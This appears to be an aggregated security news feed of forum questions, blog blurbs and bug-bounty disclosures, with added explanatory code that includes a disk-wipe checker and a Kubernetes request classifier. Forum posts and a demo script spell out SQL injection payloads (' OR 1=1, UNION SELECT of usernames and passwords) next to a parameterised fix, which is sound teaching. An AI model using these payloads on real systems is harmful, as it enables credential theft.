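    """Return (signature of sector 0, offsets where non-zero data was found)."""
    fh.seek(0)
    sig = volume_signature(fh.read(SECTOR))
    return sig, sampled_nonzero_offsets(fh, size)


def _constructed_image(size, header=b""):
    """Constructed sample image, not real drive data."""
    buf = bytearray(size)
    buf[:len(header)] = header
    return io.BytesIO(bytes(buf))


def demo(size=8 << 20):
    """Run the checks on two constructed images: one still carrying a
    BitLocker boot sector, one fully zeroed."""
    encrypted = _constructed_image(size, b"\xeb\x58\x90" + BITLOCKER_OEM_ID)
    zeroed = _constructed_image(size)
    return verify_wipe(encrypted, size), verify_wipe(zeroed, size)


if __name__ == "__main__":
    # Usage: python verify_wipe.py /dev/sdX   (read-only; needs permission)
    if len(sys.argv) == 2:
        with open(sys.argv[1], "rb") as fh:
            fh.seek(0, 2)
            print(verify_wipe(fh, fh.tell()))
    else:
        print(demo())
```

    The read-back answers "did the overwrite reach the logical space", not "did it reach every flash cell"; for the latter, the drive's own sanitize path (NVMe `nvme sanitize` or `nvme format --ses=1`, ATA Secure Erase via `hdparm --security-erase`) is the mechanism that covers remapped and over-provisioned blocks, and this script is the verification run after it.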
    plaso timeline analysis
    I'm new to plaso. I know how to create one, but I don't know how it can be helpful or where to look when I want to know when the backdoor file was created, whether the antivirus detected a malicious file, or the creation time of a backdoor registry key. Are there some examples that might help make things clear? submitted by /u/sk8er_girl90 [link] [comments]
    PST search tool
    Any good programs where I can import a PST and do searches, tag and export those tags to PST submitted by /u/theedon323 [link] [comments]
    Trying to play security camera footage from 2004. It's going as well as you'd expect.
    I'm trying to extract video footage that was downloaded from an unknown security system back in 2004. The files were originally on an Iomega 100mb Zip Drive if anyone remembers those things. I transferred the files to my laptop, and in the folder there was included a program called "Image Vault Viewer" (IVViewer.exe) which I assume is supposed to be the player application. (I had to open it in XP Compatibility Mode to get it to run.) When I choose to open a file from the application interface, I'm only allowed to select one file type (.cls) and I get an error as shown in the video. I recorded my screen so you can see all the different file types in the folder, as well as the error when trying to open something. A note, the (.vls) files show as being associated with IVViewer because I tried to open them with that program. That didn't work. You'll also see an "Ableton Live Set" (.als) file, but that's probably because I have Ableton audio installed on my laptop. I'm sure that 18 years ago the (.als) file extension was associated with something else. Can anyone give me some tips here? The video files show a murder occurring. The suspect was on the run for years and was just recently caught, but technology has advanced so much since then that this older stuff is really hard to work with. Thanks! https://reddit.com/link/ut3z7z/video/no7r4aujsf091/player submitted by /u/YabbaDabbaDoofus [link] [comments]
    Snapchat Forensics on smartphones
    Hi, fellow experts, I've been testing Snapchat's features and have a few questions to ask: Is it possible to recover Snapchat text messages (not images & videos) on Android and Apple smartphones? I can see images under Snapchat file folder on the phone. Is it possible to know who sent them (Snapchat username)? I'm having a hard time determining the correlation between XML record and actual image. Is there a sure way to determine who sent what? submitted by /u/Dreamlad [link] [comments]
    Digital Forensics Masterclass
    submitted by /u/cybersocdm [link] [comments]
  • Open

    Rolling Thunder is a Go
    How Ottawa’s War Memorial is becoming a symbol of polarization and division Continue reading on Medium »
    War in Ukraine / May 18
    The Russian army reduced the offensive Continue reading on Medium »
    One day in a life of OSINT geek: how Data Lookup helps to learn a lot in a couple of clicks
    We are actively developing our online Data Lookup tool, as more and more users tend to fulfill their OSINT tasks using quick and simple… Continue reading on Medium »
    Find anything online with Google dorks — part 1
    Google dorks are a fantastic way to to quickly filter search results and find an absolute treasure trove of information online. By simply… Continue reading on Medium »
    My Telegram investigation toolkit…
    Hooray, my channel has exceeded 200 subscribers… As promised, I am posting my selection of sources intended for investigations in Telegram… Continue reading on Medium »
  • Open

    Bug Bounty Diaries #2
    Hi guys! I’m back with a new blog and this is great because again… I learn a lot of things, specially about DNS, IP and things like that. Continue reading on Medium »
    A Story of DOM XSS
    Good day, everyone! This is my second article, this time on DOM XSS. An open redirection vulnerability was escalated to DOM XSS. If you… Continue reading on Medium »
    Cyber Apocalypse CTF 2022 — Intergalactic Chase Write up
    Hello everyone I am Hac and today we are doing Cyber Apocalypse CTF 2022 , Specifically this challenges :- Continue reading on InfoSec Write-ups »
    Hacking Web3: Introduction and How to Start
    Web3 is a newfound technology, and it’s claimed that it can greatly increase the security on the websites using it. In fact, web3 is a new… Continue reading on CoinsBench »
    Hacking Web3: Introduction and How to Start
    Web3 is a newfound technology, and it’s claimed that it can greatly increase the security on the websites using it. In fact, web3 is a new… Continue reading on Medium »
    How I was able to access IBM internal documents
    Hi, today I will share how I was able to access internal data of https://weathercommunity.ibm.com using salesforce misconfiguration. Continue reading on Medium »
    From Wayback to Account Takeover
    Hi, I would like to share how Wayback Machine leads to limited Account Takeover. Continue reading on Medium »
    CRLF (%0D%0A) Injection
    Hello Guys! I am vasu a bug bounty researcher Continue reading on Medium »
    How I Got $1083 worth of book bundle for just $1 — #Bugbounty
    Price manipulation at checkout: Continue reading on Medium »
    How I Exploited 4 Vulnerabilities In A Website
    This blog is only for informational purpose only so that emerging bug hunters could follow similar methodology and responsibly disclose… Continue reading on Medium »
    A pragmatic guide to building your bug bounty program
    Part 1: Getting set up, and maintaining your program Continue reading on Airwallex Engineering »
  • Open

    Scam and Malicious APK targeting Malaysian: MyMaidKL Technical Analysis
    submitted by /u/Rempah [link] [comments]
    Rise in XorDdos: A deeper look at the stealthy DDoS malware targeting Linux devices
    submitted by /u/SCI_Rusher [link] [comments]
    Exploiting an Unbounded memcpy in a Guest-to-Host escape of Parallels Desktop
    submitted by /u/gaasedelen [link] [comments]
    Killnet Attacks Against Italy and NATO Countries
    submitted by /u/MiguelHzBz [link] [comments]
  • Open

    Weaponization of Excel Add-Ins Part 2: Dridex Infection Chain Case Studies
    We discuss XLL and XLM droppers that deliver Dridex samples. We cover examples of the Dridex infection chain. The post Weaponization of Excel Add-Ins Part 2: Dridex Infection Chain Case Studies appeared first on Unit42.
  • Open

    [Security Advisory] VMware authentication bypass vulnerability (CVE-2022-22972)
    VMware recently published a security advisory fixing a high-severity authentication bypass vulnerability affecting Workspace ONE Access, Identity Manager and vRealize Automation; currently...
  • Open

    How Dual Messenger technically works on Samsung devices
    I know that Android OS is a privilege-separated OS in which each application has a separate /data folder that it writes to, and each app has its own PID. With that mentioned, I believe my question's answer can easily be observed on a rooted device, i.e. how an applied Dual Messenger app structures its folders, etc. Do these two apps (the original and the clone) share the same storage? Could anyone give a technical explanation of how this works? Thanks submitted by /u/Camera-Soft [link] [comments]
    Does a DNS enabled "gray-net", akin to the dark net w/ onion sites, exist?
    Question spawned from: https://www.reddit.com/r/degoogle/comments/usi7w7/protonmail_ios_android_mobile_apps_sending/i97bt4a/ https://www.reddit.com/r/privacy/comments/uscrg2/protonmail_app_on_ios_regularly_talking_to_google/ https://www.reddit.com/r/ProtonMail/comments/uscbnz/protonmail_app_on_ios_constantly_talking_to/i93is94/ tl;dr - proton github source code for a few of their different apps reference the host dMFYGSLTQOJXXI33ONVQWS3BOMNUA.protonpro.xyz. Traditional ping & nslookup do not find the host dMFYGSLTQOJXXI33ONVQWS3BOMNUA.protonpro.xyz. Using a tool that can do DoH to quad9, dMFYGSLTQOJXXI33ONVQWS3BOMNUA.protonpro.xyz resolves to dayana.ns.cloudflare.com. I'm not a DNS wizard, so I'm not sure if I'm understanding this right, so call me out: is it possible for 3rd party DNS providers to have hosts that resolve only thru that 3rd party, and only over DoH vs traditional DNS??? i.e. a "gray net" that's only resolveable via certain DNS methods? submitted by /u/SOsint [link] [comments]
    Unable to install VirtualBox NDIS6 Bridged Networking Driver.
    Hello, I am having trouble installing the NDIS6 Bridged Networking Driver. I tried to install the program in the title in my environment and got the message "The requested functionality was not found. The specified module cannot be found" and I cannot install it. I have no idea which module to install, etc., so I would like to know the solution. submitted by /u/Awkward_String139 [link] [comments]
    deleted post with solutions: 'Hi, code injection help please'
    Hi, I'm typing 1' or ‘1’=’1 in the search box when trying to find all the persons, usernames and passwords in the database. But I get the following error message: There was error in your query: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''' at line 1 The server version is Apache/2.4.41 (Ubuntu) and I found that it is MariaDB-5.5.41. How can I find the right syntax? Thanks SOLUTIONS: It worked with typing only ' OR 1=1; # for showing all the persons in the database, and ' UNION SELECT null, username, password FROM users # to find all the usernames and passwords in the database. submitted by /u/Traditional_Bird_877 [link] [comments]
    Help with blind SQL injection please
    Hello, I need to get the usernames and passwords from an Online Auction System: http://www.blabla.com/index.php?product=Chair I've tried injecting this but no results: /index.php?product=select%20username,%20password%20from%20users%20where%20product=Chair%20and%201%3D1%20%23 Can I have some help? Thanks submitted by /u/Traditional_Bird_877 [link] [comments]
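    What the two SQL injection posts above are running into, shown end to end as an added example that is not code from either thread: a search built by string concatenation, the unbalanced-quote payload that produces a syntax error, the comment-terminated payloads that return every row and then the users table, and the parameterised query that treats the same payloads as literal text. SQLite stands in for the MariaDB server in the posts (an assumption: same bug, but SQLite's line comment is `--` where MariaDB also accepts `#`); the tables and rows are constructed.

```python
"""Why the quoted payload errored and why the commented one worked
(added example; not code from either thread). SQLite stands in for MariaDB:
the same string-concatenation bug applies, but SQLite's line comment is
"--" where MariaDB also accepts "#". Tables and rows are constructed."""
import sqlite3


def _db():
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE persons(id INTEGER, name TEXT, email TEXT);
        INSERT INTO persons VALUES (1, 'Alice', 'alice@example.test'),
                                   (2, 'Bob',   'bob@example.test');
        CREATE TABLE users(id INTEGER, username TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'admin', 's3cret'), (2, 'guest', 'guest');
    """)
    return con


def vulnerable_search(q):
    """Builds the query by string formatting, so attacker text becomes SQL.
    Returns the rows, or 'syntax error' when the payload leaves the quoting
    unbalanced (the MariaDB "near '''" error in the post)."""
    sql = f"SELECT id, name, email FROM persons WHERE name LIKE '%{q}%'"
    try:
        return _db().execute(sql).fetchall()
    except sqlite3.OperationalError:
        return "syntax error"


def safe_search(q):
    """Parameterised: the payload is matched as a literal LIKE pattern."""
    return _db().execute(
        "SELECT id, name, email FROM persons WHERE name LIKE ?", (f"%{q}%",)
    ).fetchall()


UNBALANCED = "1' or 1=1"      # leaves the template's closing %' dangling
TAUTOLOGY = "' OR 1=1 --"     # the comment swallows the dangling tail
UNION = "' UNION SELECT null, username, password FROM users --"  # 3 columns


def demo():
    """Run each payload against both implementations."""
    return {
        "unbalanced": vulnerable_search(UNBALANCED),
        "tautology": vulnerable_search(TAUTOLOGY),
        "union": vulnerable_search(UNION),
        "safe_union": safe_search(UNION),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(name, result)
```

    The UNION payload only works because it matches the three columns the original SELECT returns; that is also why the second post's attempt, which replaced the whole parameter with a bare `select username, password from users` instead of closing the existing quote first, produced nothing.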
    Cannot create host-only adapter on VirtualBox
    I am unable to create a host-only adapter. I am using version 6.1.22. The following is the error message. Querying NetCfgInstanceId failed (0x00000002). Exit code : E_FAIL (0x80004005) Component: HostNetworkInterfaceWrap Interface: IHostNetworkInterface {455f8c45-44a0-a470-ba20-27890b96dba9} submitted by /u/Awkward_String139 [link] [comments]
  • Open

    8x8pilot.com: Reflected XSS in Apache Tomcat /jsp-examples example directory
    8x8 disclosed a bug submitted by huntinex: https://hackerone.com/reports/1400357
    Stored XSS in repository file viewer
    GitLab disclosed a bug submitted by kannthu: https://hackerone.com/reports/1072868 - Bounty: $2000
    Email html Injection
    Slack disclosed a bug submitted by smitgharat0001: https://hackerone.com/reports/1461194 - Bounty: $250
    XSS and iframe injection on tiktok ads portal using redirect params
    TikTok disclosed a bug submitted by cancerz: https://hackerone.com/reports/1514554 - Bounty: $1000
  • Open

    SecWiki News 2022-05-19 Review
    Wobfuscator: converting parts of malicious JavaScript into WebAssembly to evade detection, by ourren; Draft technical guide on infrastructure security resilience (firmware security chapter), by ourren. For more new articles, visit SecWiki.
  • Open

    Disclosure of Top Vulnerability
    Article URL: https://hackerone.com/reports/397031 Comments URL: https://news.ycombinator.com/item?id=31436248 Points: 1 # Comments: 0
  • Open

    OSS-Fuzz: Continuous Fuzzing for Open Source Software
    Article URL: https://google.github.io/oss-fuzz/ Comments URL: https://news.ycombinator.com/item?id=31435504 Points: 2 # Comments: 0
  • Open

    Java deserialization basics 01: concepts and exploitation
    I wrote this article to go over the fundamentals of Java deserialization a few more times; after all, every skyscraper starts from the ground.
    Hands-on "white plus black" (signed-binary DLL sideloading) AV evasion anyone can do
    Top-notch material: practical white-plus-black AV evasion anyone can do!
    Fake ads cast a wide net: have you been phished?
    Stay alert, stay skeptical.
    FreeBuf Morning Report | Ransom demands jumped 45% in 2021; personal data of nearly 2 million Texans exposed for three years
    According to Group-IB, the average ransom demand in 2021 was $247,000, up 45% from the previous year.
    A step-by-step guide to building a Tomcat memory shell
    Step-by-step Tomcat memory shell: come and learn.
    Zip Slip vulnerability in Xinje PLC programming software: a study of CVE-2021-34605
    Xinje PLC programming software V3.5.1 has a Zip Slip vulnerability: an attacker gains arbitrary file write when a specially crafted project file is opened.
    Personal data of nearly 2 million Texans exposed for three years
    Because of a programming error at the Texas Department of Insurance (TDI), the personal information of nearly 2 million Texans was exposed for almost three years.
    Conti gang threatens to overthrow the Costa Rican government
    The Conti ransomware gang recently threatened to "overthrow" the government of Costa Rica.
    VMware patches critical authentication bypass vulnerabilities in multiple products
    A critical authentication bypass affecting multiple VMware products allows attackers to gain administrator privileges.
    Microsoft: beware of brute-force attacks on MSSQL servers
    Microsoft is warning users of MSSQL database servers that attackers are brute-forcing weak passwords on internet-exposed MSSQL instances.
  • Open

    Active Directory Overview
    No content preview
    Unicode from HackTheBox — Detailed Walkthrough
    No content preview
  • Open

    A new way to bypass `__wakeup()` and build POP chain
    Author: 1nhann. Original: https://inhann.top/2022/05/17/bypass_wakeup/. Using Laravel 9.1.8 as the example, this article presents a general new approach to bypassing the __wakeup() encountered while building a POP chain. Environment setup: Laravel 9.1.8, routes/web.php : <?php use Illuminate\Suppo...
    CVE-2021-42287 Windows domain privilege escalation vulnerability analysis
    Author: dre4merp. Contributed article; Seebug Paper welcomes your submissions, and every accepted piece receives a gift. Submission e-mail: paper@seebug.org. Preface: this article analyses the root cause of the vulnerability mainly by debugging Windows Server 2003. It requires some Kerberos background and the ability to read and debug Windows source; reading alone may not convey the key points, so hands-on debugging is recommended. Background: the vulnerability identifier is CV...
  • Open

    Advanced Persistent Threat (APT) Malware Samples and Research Papers Collection
    submitted by /u/cybersocdm [link] [comments]
  • Open

    K8s cluster stability: LIST request source analysis, performance evaluation, and tuning for large-scale foundational service deployments
    For unstructured data storage systems, a LIST operation is usually very heavyweight: it consumes large amounts of disk IO, network bandwidth and CPU, and it degrades other requests in the same time window (especially leader-election requests, which demand very low latency). It is a major killer of cluster stability.
    For example, in Ceph object storage every LIST bucket request has to pull the bucket's full contents from multiple disks; besides being slow itself, it slows the ordinary read/write requests in the same window because IO is shared, raising response latency and even causing timeouts. If a bucket holds a very large number of objects (e.g. when it is the storage backend for harbor/docker-registry), LIST cannot even finish in a reasonable time (so the registry GC, which depends on LIST bucket, cannot run).
    Another example is the KV store etcd. Compared with Ceph, a real etcd cluster may hold very little data (a few to a few dozen GB), small enough to cache in memory. Unlike Ceph, though, its concurrent request count can be several orders of magnitude higher, for instance when it is the etcd of a ~4000-node k8s cluster. A single LIST may return only tens of MB to a GB or more of data, but once there are many concurrent requests etcd clearly cannot cope, so a cache layer in front is needed; that is (one of) the apiserver's functions. Most k8s LIST requests should be stopped at the apiserver and served from its local cache, but if they are used improperly they bypass the cache and reach etcd directly, a serious stability risk.
    This article studies in depth the LIST handling logic and performance bottlenecks of the k8s apiserver/etcd, and offers LIST load-test, deployment and tuning advice for foundational services to improve the stability of large k8s clusters. kube-apiserver LIST request handling logic: the code is based on v1.24.0, though the basic logic and code paths for 1.19 to 1.24 are…
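    A way to see which LIST requests "skip the cache and reach etcd", as an added example that is not code from the article: a classifier over the request URI query parameters, run over a handful of constructed audit-log requestURIs. The rules are a simplified reading of the documented resourceVersion semantics for list (unset resourceVersion is a quorum read from etcd, "0" is served from the apiserver watch cache, continue tokens and resourceVersionMatch=Exact go to etcd, and a non-zero resourceVersion with limit but no resourceVersionMatch is an exact paged read from etcd); treat them as an assumption to verify against the apiserver version in use, since pagination behaviour has changed across releases.

```python
"""Which backend serves a kube-apiserver LIST? Added example, not from the
article. Encodes a simplified reading of the documented resourceVersion
semantics for list (an assumption to verify per apiserver version):
  resourceVersion unset            -> etcd (quorum read, "most recent")
  resourceVersion=0                -> watch cache ("any"; limit ignored)
  continue=<token>                 -> etcd (pagination)
  resourceVersionMatch=Exact       -> etcd
  resourceVersion=N + limit, no resourceVersionMatch -> etcd (exact, paged)
  otherwise (NotOlderThan)         -> watch cache
The request URIs below are constructed, in the form audit logs record them."""
from collections import Counter
from urllib.parse import parse_qs, urlsplit


def list_served_from(request_uri: str) -> str:
    """Return 'etcd' or 'watch-cache' for one LIST request URI."""
    q = {k: v[-1] for k, v in parse_qs(urlsplit(request_uri).query).items()}
    rv = q.get("resourceVersion", "")
    match = q.get("resourceVersionMatch")
    if q.get("continue"):
        return "etcd"          # a continue token always pages through etcd
    if rv == "":
        return "etcd"          # "most recent": quorum read of the whole set
    if match == "Exact":
        return "etcd"
    if rv == "0":
        return "watch-cache"   # "any" version; limit is ignored here
    if "limit" in q and match is None:
        return "etcd"          # exact-version paged list
    return "watch-cache"       # NotOlderThan, explicit or implied


def tally(request_uris):
    """Count requests per backend. A large 'etcd' share on a busy cluster is
    the stability risk the article describes."""
    return Counter(list_served_from(u) for u in request_uris)


# Constructed sample of requestURI values; not taken from any real cluster.
CONSTRUCTED_AUDIT_URIS = [
    "/api/v1/pods",                                   # client-go List() with empty options
    "/api/v1/pods?resourceVersion=0",                 # informer/reflector initial list
    "/api/v1/pods?limit=500",                         # kubectl get, chunked
    "/api/v1/pods?resourceVersion=0&limit=500",
    "/api/v1/pods?continue=eyJ2IjoibWV0YS5rOHMuaW8vdjEifQ",
    "/api/v1/pods?resourceVersion=12345&resourceVersionMatch=Exact",
    "/api/v1/pods?resourceVersion=12345",
    "/api/v1/pods?resourceVersion=12345&resourceVersionMatch=NotOlderThan&limit=500",
]


if __name__ == "__main__":
    for uri in CONSTRUCTED_AUDIT_URIS:
        print(f"{list_served_from(uri):12s} {uri}")
    print(tally(CONSTRUCTED_AUDIT_URIS))
```

    Fed with the requestURI field of real audit events for verb=list, the tally shows which clients and service accounts are the ones bypassing the cache; the fix on the client side is usually to set resourceVersion=0 (or use an informer) rather than issuing a bare List.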

  • Open

    Bug Bounty Diaries #1
    Hi guys! I have a lot of things to say on this blog and the truth is that I didn’t try to exploit anything because WOW! Continue reading on Medium »
    Hack First, Bounty Later
    Two months ago we came across an interesting and somewhat provocative Tweet. Continue reading on Medium »
    How to Install airixss
    Hello all, we will see how to install airixss on kali linux. Continue reading on Medium »
    Creo Engine Presents ‘Evermore Knights Bug Bounty Contest’
    Creo Engine is developing its first game called “Evermore Knights” and Creo Engine recognizes the importance of security researchers in… Continue reading on Medium »
    Methods to Exploit HTML Injection
    In this article, we will discuss the HTML Injection vulnerability, and 3 methods of how to creatively leverage it for exploitation. Continue reading on Medium »
  • Open

    Anonymous Social Network Yik Yak Breached Precise GPS Locations
    submitted by /u/mkdtsh [link] [comments]
    Hack The Box - Timing - Writeup by Mădălin Dogaru
    submitted by /u/Madalin_Dogaru [link] [comments]
    Variant Cloud Analysis
    submitted by /u/Gallus [link] [comments]
    Wizard Spider hacking group detailed analysis
    submitted by /u/wtfse [link] [comments]
    TProxy: Wireshark dissection with manual and scripted interception
    submitted by /u/mexicanw [link] [comments]
  • Open

    Clipboard
    Can websites read/access our entire clipboard contents? I'm scared because I have my passwords,documents(passport/ID), pictures of me etc. saved on my clipboard. I obviously don't want any website viewing my clipboard...especially not the p*rn, or any unsafe sites I visit or even those phishing sites I got redirected to. I don't click or enter any login credentials on such sites but obviously do use the search bar. I don't even actually paste anything from my clipboard on these sites tho let me clear that. Or do they just see what I copied recently onto my clipboard? Help needed. I'm looking for an accurate and realistic answer and not some conspiracy theories. Thanks. submitted by /u/hamza_x17 [link] [comments]
    Excel & Power Bi for security/ data analysis
    Hi. Do you know any courses/blogs where Excel or Power BI are used for data analysis and building cool charts? I very often use Excel to analyze data from Azure/SIEM/network data/user activity: building stats (pivots) or visualising data (any timelines), creating formulas such as "how long has the user been inactive", or parsing data. I'm interested in additional courses on Excel/Power BI for data analysis to improve my skills. What courses have you used? submitted by /u/athanielx [link] [comments]
    What network security monitoring (NSM) product do you know?
    Hi there. I'm looking for NSM products (they can be open-source too). We in the company want to implement NSM. The first option is to organize everything with our own resources on the basis of Zeek & Suricata & ELK (log manager), but I'm afraid it will be difficult to manage and support with our not-large team. So the second option is to delegate it to a third party. The closest for me was Corelight, but they don't have an agent for our environment. AC-Hunter was interesting to me too, but their main focus is C2 detection and some built-in threat intel, so it's not enough for our NSM. submitted by /u/athanielx [link] [comments]
    Analyze MP3 file for viruses
    I understand that MP3 files can contain viruses. Can you please suggest a way to analyze it apart from virustotal and other online AV ? Thanks submitted by /u/AnotherRedditUsr [link] [comments]
    Need Career Advice
    Hi, I'm working as a Java automation tester and have been for a year and a half. I'm not satisfied with my job and salary. I'm more interested in cybersecurity; since last August I have been learning ethical hacking and pentesting principles. I have completed a few basic rooms in THM and the starting-point machines in HTB (with help from hints in write-ups). I can't quit my job right now, but I want to switch domain. How do I get at least an entry-level position in cybersecurity? submitted by /u/sunilprashanthh [link] [comments]
    How to land a SOC analyst job without degree
    I need a reality check. All the employers are looking for experienced workers; however, there is no way to gain experience because I can't even land a job. Currently I'm on a helpdesk without any prior security experience. I've been applying for entry-level security jobs since January 2021. It seems really hard to land any entry-level job here without a CS or related degree. Just wondering if there is a way to break through into the security field. If there is any training program or certification that can help me, please advise. submitted by /u/ChillaxJ [link] [comments]
  • Open

    Bypass global deny-lists by wrapping domains using "[]" in https://github.com/stripe/smokescreen
    Stripe disclosed a bug submitted by haxatron1: https://hackerone.com/reports/1528242 - Bounty: $500
    Conduit feed.publish API allows you to spoof other users or make it look like you have access to a restricted object
    Phabricator disclosed a bug submitted by dyls: https://hackerone.com/reports/1566325 - Bounty: $300
  • Open

    War in Ukraine / May 17
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    GEOINT#1 — Sino-Myanmarese Borders
    During my daily waste of time on Douyin (抖音, the Chinese TikTok), I came across the following video: Continue reading on Medium »
    GEOINT#1 — Frontières Sino-Birmanes
    Durant ma perte de temps quotidienne sur Douyin (抖音, le TikTok chinois), je suis tombé sur la vidéo suivante: Continue reading on Medium »
    Moonshot Team Spotlight #01
    We are pleased to share our new Moonshot Team Spotlight Series. Continue reading on Medium »
  • Open

    SecWiki News 2022-05-18 Review
    SSTI vulnerability basics, by SecIN community; Decompiling WeChat mini programs, by ourren; A Graph Kernel-based method for selecting API usage examples, by ourren; The best global cybersecurity guidance from the Five Eyes, by ourren; Getting started quickly with the cloud-native security platform NeuVector, by ourren; Cobalt Strike analysis: encoding and decoding CS metadata, by ourren; Top ten cybersecurity vulnerabilities of 2021 and an introduction to the "Lazarus" group, by ourren. For more new articles, visit SecWiki.
  • Open

    calculus notes
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
  • Open

    FreeBuf Morning Report | Conti ransomware gang vows to overthrow government; Russian hacker group releases video declaring war on the US, Ukraine and eight other countries
    After the Costa Rican government refused to pay the ransom, the Conti ransomware gang claimed responsibility for the attack; now it is threatening to "overthrow" the country's new government.
    HackMyVM-hostname
    This box was released just last week; one of the extraction techniques was quite novel to me, so I wanted to write it up.
    Major flaw in smart cars: hackers drive off with a Tesla in 10 seconds
    The whole attack takes less than 10 seconds to open the door, and it can be repeated indefinitely.
    NVIDIA fixes ten vulnerabilities in its Windows GPU display driver
    NVIDIA has released security updates for various graphics card models.
    Hackers exploit Tatsu WordPress plugin flaw in millions of attacks
    Tatsu Builder contains the remote code execution vulnerability CVE-2021-25094, which attackers are exploiting in large-scale attacks.
    Beware of spyware! Over 200 Play Store apps may be at risk
    Researchers recently observed more than 200 Android apps distributing spyware called Facestealer.
    Venezuelan cardiologist charged as the mastermind behind Thanos ransomware
    The US Department of Justice charged a 55-year-old Venezuelan doctor with being the mastermind behind the Thanos ransomware, from which he profited substantially by selling it.
    Future Zhian (未来智安): XDR breaks down data silos and cuts useless alerts | Cybersecurity New Force SOLO launch season
    This episode features Tang Jiajia, founder and CEO of Beijing Future Zhian Technology Co., Ltd., a new force in offensive and defensive security, presenting "A brief discussion of XDR, extended detection and response".
    On building an enterprise SOAR project
    SOAR has been around for several years, yet many people are still on the fence; let's discuss SOAR project construction together.
  • Open

    Target=“_blank” – the most underestimated vulnerability ever (2021)
    Article URL: https://www.jitbit.com/alexblog/256-targetblank---the-most-underestimated-vulnerability-ever/ Comments URL: https://news.ycombinator.com/item?id=31421473 Points: 22 # Comments: 4
  • Open

    Attacking and Defending Active Directory : Bootcamp Review
    Hello Guys, Continue reading on Medium »
  • Open

    The Basics of Subdomain Takeovers
    No content preview
  • Open

    Nextcloud CVE-2022-24890: A call moderator can indirectly enable user webcams
    Article URL: https://nvd.nist.gov/vuln/detail/CVE-2022-24890 Comments URL: https://news.ycombinator.com/item?id=31419833 Points: 3 # Comments: 0

  • Open

    USB Devices Redux
    Back in 2005, Cory Altheide and I published the first paper on tracking USB storage devices across Windows systems; at the time, the focus was Windows XP. A lot has happened since then...I know, that's an understatement...as the Windows platform has developed and expanded, initially with Vista, then Windows 7, and even with Windows 10 there have been developments that have come (and gone) just between the various Win10 builds. With respect to USB devices in particular, not long ago, we (the community) became aware that the Microsoft-Windows-DriverFrameworks-UserMode/Operational Event Log contained quite a bit of information (see this post for event IDs to track) that a digital forensic analyst could use to determine if and when USB devices had been connected to (and disconnected from) the…
  • Open

    Home Firewalls
    What are your favorite small-end firewalls and why? Are there any features or capabilities that you were particularly impressed with? Any lessons learned that can be shared from your experience? submitted by /u/Noah_Ahn [link] [comments]
    Burp Suite Arm64 Linux???
    I'm using an M1 MacBook Air and I'm learning Burp Suite with TryHackMe. I use a virtual machine for anything hacking/OSINT related, but the problem is that Burp Suite isn't available for Linux arm64. Should I just switch back to my Mac when I want to use Burp, or just not use it at all? submitted by /u/Puzzleheaded-Bid7382 [link] [comments]
    What are the fault lines in Cyber Security in 2022?
    Almost every discipline and industry has its fault lines. These are areas where, among experts, there are fundamental disagreements on how a problem should be approached or solved. But what are the fault lines in Cyber Security in 2022? submitted by /u/astillero [link] [comments]
    Looking for what to watch on malware file changes, excerpt in comments
    I was reading this from a site (minerva labs) and am wondering, are these file changes things that are logged in windows? how do you keep track of such fine tuned changes? " Before executing any malicious code, a couple of anti-emulation techniques are used. First, the malware calls SetFileAttributesA with the parameters “C:\windows\Explorer.exe” and FILE_ATTRIBUTE_NORMAL (0x80) and if the function succeeds the malware will exit. Secondly, the malware calls the function WriteFileGather with the invalid handle 0, and exits if the return value is not 0. " submitted by /u/networkalchemy [link] [comments]
    Android malware found in personal laptop memory dump
    Hello. I'm a newbie to the security field and I'm looking for advice on how to proceed with a strange situation. As part of a class I used Ramcapturer to dump my memory and analyze it with Winhex. Here is a sample of the strange values I found: talkbacktstakeextraordinaryscreenshotsendurltologblockappdescr_or_urlMonitoringTool:AndroidOS/PhoneSpy.C connectorcontroller beginattack:senddata/hacking/my programs/source/cocoa/zapattack/udpfloodercontroller.hTrojanDropper ±mitmopsmitmserver There are many more including some for MacOS. This dump is after I reinstalled a fresh copy of windows. Malware scans do not turn anything up. At one point, I believe I was being investigated due to business ties with some white collar people. At that time I did have an Android, but now I have an iPhone. I believe the laptop was contaminated by contact with either an old router or an old USB stick. Questions: How can I safely analyze and erase the MBR /GPT on my NVME SSD, since everything was disconnected during reinstall? What programs could give more insight into my RAM? Is it safe to run my OPNSense firewall to see what my network is doing? How about Security Onion on proxmox? Thanks! submitted by /u/Beneficial-Monk-4165 [link] [comments]
    CTI
    I am trying to get into CTI as a beginner into Cyber. Any recommendations? submitted by /u/knappyboy1 [link] [comments]
    Weird stuff happening on my laptop.
    Hi! Lately I've been noticing weird stuff happening on my laptop. I haven't been visiting any shady sites or downloaded free games. I noticed that my background has changed twice by itself. First time it changed to some low resolution picture of sky but there were stars drawn on it. The second time it changed to also low resolution picture, but this time it was a picture of lighting. I can't provide a picture of the two backgrounds because I don't know where they are saved. I also noticed that Chrome is downloading stuff by itself, but I can't see what. I looked at the downloads history and I can't find anything new. I don't know if this is related, but a while ago an error message appeared on my screen and it said that it is having problems downloading an extension for Chrome and it needed my approval to retry the download, but I haven't been downloading any extensions on my laptop. Later that day I wanted to check something on my laptop and there was a message "No bootable device". I would like to know why it happens and I would be very grateful if someone on this subreddit answers my question. Goodbye. :-) submitted by /u/Programmer2009 [link] [comments]
    Flatpak adequate for this scenario?
    I'm concerned about potentially malicious extensions in my vscode, and I'm considering flatpak to mitigate this rather than going the full blown VM route. My thinking is a bit jumbled on this though, so I'd like it if I could hear someone else's thought process behind their own security precautions for more sensitive things like vscode. I'm a student, but I hope to begin freelancing after I acquire adequate skills, so that will be an additional security concern on top of just not wanting my system infected. submitted by /u/NoBuyer49 [link] [comments]
  • Open

    BackendTwo — HackTheBox — Writeup
    Hello guys, sorry for uploading late. I didn't have time, so let's start talking. By the way, this box is a UHC box (Ultimate Hacking Championship)… Continue reading on Medium »
    Bug Bounty Diaries #0
    Hi guys, I'm back with another blog and I know it's been a while, but I'm so excited because with these blogs I'll explain my way on bug… Continue reading on Medium »
    Want to learn Account Takeover? I got you
    Introduction Continue reading on Medium »
    CLV Wallet Bug Bounty Campaign
    Reward Pool of 100,000 CLV! Continue reading on Medium »
    What hacking is and why it matters!
    When people hear about hacking, there are different connotations to it! But the common interpretations of the term “hacking” in many… Continue reading on Medium »
